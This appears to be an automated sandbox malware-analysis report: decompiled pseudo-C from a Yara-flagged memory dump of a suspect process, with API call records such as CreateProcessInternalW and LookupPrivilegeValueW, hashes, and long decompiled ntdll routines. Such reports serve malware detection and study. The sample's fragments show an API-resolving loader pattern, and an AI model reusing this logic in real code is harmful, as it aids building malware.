                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                      • Instruction ID: 911db517c5bfb93c480bf4e8b2cb4a6d15252e6a9ee60ca7031b543c1908ba65
                                                                      • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                      • Instruction Fuzzy Hash: 7E01AFB2210108BBCB58DF89DC84EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0041894F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                      				void* _t23;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				intOrPtr* _t36;
                                                                      				void* _t38;
                                                                      
                                                                      				_t17 = _a4;
                                                                      				_t3 = _t17 + 0xc80; // 0x8bec97d5
                                                                      				_t36 = _t3;
                                                                      				E004191D0(_t34, _a4, _t36,  *((intOrPtr*)(_t17 + 0xa14)), 0, 0x37);
                                                                      				_t23 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t35, _t38); // executed
                                                                      				return _t23;
                                                                      			}









                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 07484bd03f0e6aff14c3f999912742789f5b5fd8a2584d740707e81839c519c3
                                                                      • Instruction ID: dd9946934c6f2970027868929af1b40d4c544dc8b91ed5b216c99f50f1f292d5
                                                                      • Opcode Fuzzy Hash: 07484bd03f0e6aff14c3f999912742789f5b5fd8a2584d740707e81839c519c3
                                                                      • Instruction Fuzzy Hash: F501F2B6208148AFCB04CF99DC90DEB3BA9AF8C314F158258FA5997201C630E841CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 1883a298a2b7596fcba2e9ffa1fc5b8e8cdaaea7ca73b6deeb2bfda158875907
                                                                      • Instruction ID: 41a467c4fe67700fdf755fe294103d5bb07fbdcfe289b002915e81f6b8a53544
                                                                      • Opcode Fuzzy Hash: 1883a298a2b7596fcba2e9ffa1fc5b8e8cdaaea7ca73b6deeb2bfda158875907
                                                                      • Instruction Fuzzy Hash: 46E06DB12002046BDB14DF99CC85EDB37E89F89264F058254FE1A6B2D2C934E850C7F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188DF(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				void* _v117;
                                                                      				char _t11;
                                                                      				void* _t18;
                                                                      
                                                                      				_t8 = _a4;
                                                                      				_t4 = _t8 + 0xc74; // 0xc74
                                                                      				E004191D0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t11;
                                                                      			}







                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 6d3aaf9998e7a192f195e19e9e1837e6f4a8bc0c2b94c28815a120341604129d
                                                                      • Instruction ID: 3de22143eccd3531714949b6cb1ff928370a4ec6a6285604c94e42dc025a1065
                                                                      • Opcode Fuzzy Hash: 6d3aaf9998e7a192f195e19e9e1837e6f4a8bc0c2b94c28815a120341604129d
                                                                      • Instruction Fuzzy Hash: E6E01AB12002047BDB28DF65CC89EEB7B69AF88354F154559FD4997242C631E914CAA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				char _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                      				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}






                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				int _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}






                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E00418913(intOrPtr _a3, int _a7) {
                                                                      				void* _t13;
                                                                      
                                                                      				asm("in eax, dx");
                                                                      				asm("lodsb");
                                                                      				asm("aaa");
                                                                      				asm("sbb ebx, [gs:ecx-0x1374aa90]");
                                                                      				_t8 = _a3;
                                                                      				E004191D0(_t13, _a3, _a3 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a7);
                                                                      			}





                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 372f5065193222af8a838d11135083d52b0bc2a492e42639cb21afaebbc0a88a
                                                                      • Instruction ID: 199c1321bcf711ee00c0d61285e3909ebf664ed31ceeb88ae201b751e29af4e7
                                                                      • Opcode Fuzzy Hash: 372f5065193222af8a838d11135083d52b0bc2a492e42639cb21afaebbc0a88a
                                                                      • Instruction Fuzzy Hash: FBE08635200205BBDA20DF64CCD9ED37BA8DF0A750F1589A8F9995B342C571BA01CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418920(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}





                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ab8ed9b5328c2a021834bf3dc360876d07c984a1436b2e4c4e6086a5f8773952
                                                                      • Instruction ID: 1fbc2f74fa84c0119b641036d0a1f9b1e31dfa1b2bb8b483d63d1cf9aa5509ec
                                                                      • Opcode Fuzzy Hash: ab8ed9b5328c2a021834bf3dc360876d07c984a1436b2e4c4e6086a5f8773952
                                                                      • Instruction Fuzzy Hash: 6CB09B719014C5C5DB51D7A54608B17794477D0759F16C061D1420641F4778C095F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 013CB352
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 013CB47D
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 013CB323
                                                                      • The instruction at %p referenced memory at %p., xrefs: 013CB432
                                                                      • <unknown>, xrefs: 013CB27E, 013CB2D1, 013CB350, 013CB399, 013CB417, 013CB48E
                                                                      • The resource is owned exclusively by thread %p, xrefs: 013CB374
                                                                      • a NULL pointer, xrefs: 013CB4E0
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 013CB53F
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 013CB48F
                                                                      • The critical section is owned by thread %p., xrefs: 013CB3B9
                                                                      • *** enter .cxr %p for the context, xrefs: 013CB50D
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013CB38F
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 013CB2DC
                                                                      • *** Inpage error in %ws:%s, xrefs: 013CB418
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 013CB39B
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 013CB2F3
                                                                      • The instruction at %p tried to %s , xrefs: 013CB4B6
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 013CB314
                                                                      • This failed because of error %Ix., xrefs: 013CB446
                                                                      • write to, xrefs: 013CB4A6
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 013CB484
                                                                      • Go determine why that thread has not released the critical section., xrefs: 013CB3C5
                                                                      • The resource is owned shared by %d threads, xrefs: 013CB37E
                                                                      • *** enter .exr %p for the exception record, xrefs: 013CB4F1
                                                                      • read from, xrefs: 013CB4AD, 013CB4B2
                                                                      • an invalid address, %p, xrefs: 013CB4CF
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 013CB305
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 013CB476
                                                                      • *** then kb to get the faulting stack, xrefs: 013CB51C
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013CB3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 1de951e1d53fbf74899f1e57f182da3b1ea53d000623bb8ed44f822e9edad19b
                                                                      • Instruction ID: 69976e0d05bfc52d11565803b369485d5fc9829dbb6a4248b629ba88e04122a9
                                                                      • Opcode Fuzzy Hash: 1de951e1d53fbf74899f1e57f182da3b1ea53d000623bb8ed44f822e9edad19b
                                                                      • Instruction Fuzzy Hash: F981E575A00210FFDB2A6A8ECC56D7FBFA9EF56A9DF40404CF5043B256E2628851C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E013D1C06() {
                                                                      				signed int _t27;
                                                                      				char* _t104;
                                                                      				char* _t105;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t120;
                                                                      
                                                                      				_t105 = 0x12f48a4;
                                                                      				_t104 = "HEAP: ";
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push( *0x140589c);
                                                                      				E0131B150("Heap error detected at %p (heap handle %p)\n",  *0x14058a0);
                                                                      				_t27 =  *0x1405898; // 0x0
                                                                      				if(_t27 <= 0xf) {
                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M013D1E96))) {
                                                                      						case 0:
                                                                      							_t105 = "heap_failure_internal";
                                                                      							goto L21;
                                                                      						case 1:
                                                                      							goto L21;
                                                                      						case 2:
                                                                      							goto L21;
                                                                      						case 3:
                                                                      							goto L21;
                                                                      						case 4:
                                                                      							goto L21;
                                                                      						case 5:
                                                                      							goto L21;
                                                                      						case 6:
                                                                      							goto L21;
                                                                      						case 7:
                                                                      							goto L21;
                                                                      						case 8:
                                                                      							goto L21;
                                                                      						case 9:
                                                                      							goto L21;
                                                                      						case 0xa:
                                                                      							goto L21;
                                                                      						case 0xb:
                                                                      							goto L21;
                                                                      						case 0xc:
                                                                      							goto L21;
                                                                      						case 0xd:
                                                                      							goto L21;
                                                                      						case 0xe:
                                                                      							goto L21;
                                                                      						case 0xf:
                                                                      							goto L21;
                                                                      					}
                                                                      				}
                                                                      				L21:
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push(_t105);
                                                                      				E0131B150("Error code: %d - %s\n",  *0x1405898);
                                                                      				_t113 =  *0x14058a4; // 0x0
                                                                      				if(_t113 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter1: %p\n",  *0x14058a4);
                                                                      				}
                                                                      				_t115 =  *0x14058a8; // 0x0
                                                                      				if(_t115 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter2: %p\n",  *0x14058a8);
                                                                      				}
                                                                      				_t117 =  *0x14058ac; // 0x0
                                                                      				if(_t117 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter3: %p\n",  *0x14058ac);
                                                                      				}
                                                                      				_t119 =  *0x14058b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0x14058b4);
                                                                      					E0131B150("Last known valid blocks: before - %p, after - %p\n",  *0x14058b0);
                                                                      				} else {
                                                                      					_t120 =  *0x14058b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E0131B150("Stack trace available at %p\n", 0x14058c0);
                                                                      			}











                                                                      0x013d1e77
                                                                      0x013d1e95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 58df002da77a68622b90d0b0d4ef17bb2e180f389b54237e289895ab883b3dc1
                                                                      • Instruction ID: e5af84baab9d672bc72d0425d3540eb50ecc4e5f7b7d9590cd2ee7980511098c
                                                                      • Opcode Fuzzy Hash: 58df002da77a68622b90d0b0d4ef17bb2e180f389b54237e289895ab883b3dc1
                                                                      • Instruction Fuzzy Hash: D061E437611149DFD616AB8AF894E31B3F8EB0893CB0A843EF9095F755D6349C508F0A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E01323D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E01321B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E01321B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L01334620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E0135F3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E01361370(_t276, 0x12f4e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E0135BB40(0,  &_v68, _t170);
                                                                      									if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E0135BB40(_t257,  &_v68, _t243);
                                                                      								if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E01361370(_t278, 0x12f4e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L01334620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E0135F3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E01361370(_v16, 0x12f4e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E0135BB40(_t262,  &_v68, _t244);
                                                                      								if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E01361370(_t282, 0x12f4e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E0135BB40(_t262,  &_v68, _t201);
                                                                      							if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L01334620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
